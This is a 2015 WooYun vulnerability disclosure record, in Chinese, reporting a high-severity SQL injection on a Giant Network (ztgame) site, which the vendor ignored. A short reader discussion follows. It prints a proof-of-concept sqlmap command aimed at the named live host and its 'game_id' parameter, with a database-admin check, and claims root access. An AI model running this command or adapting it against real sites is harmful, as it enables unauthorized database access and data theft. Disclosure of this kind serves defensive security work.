缺陷编号:WooYun-2015-0126605
漏洞标题:巨人网络之某站高危SQL注入漏洞
相关厂商:巨人网络
漏洞作者:黑暗游侠
提交时间:2015-07-14 07:20
公开时间:2015-07-19 07:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-19: 厂商已经主动忽略漏洞,细节向公众公开
ROOT权限
POC:
1 |
sqlmap -u "http://jf.ztgame.com/" --data "page=1&game_id=1&sort=asc&order=sort" -p "game_id" --level 5 --time-sec 10 --is-dba |
ROOT权限,核心站
1 |
[email protected] |
危害等级:无影响厂商忽略
忽略时间:2015-07-1907:22
漏洞Rank:15 (WooYun评价)
暂无
楼主 你应该知道自己做了什么
@黑暗游侠 sqlmap导出数据时中文是乱码怎么解决,已经在sqlmap.py里面第二行添加了 #-*-coding:utf-8-*- 但是不起作用
原文连接
的情况下转载,若非则不得使用我方内容。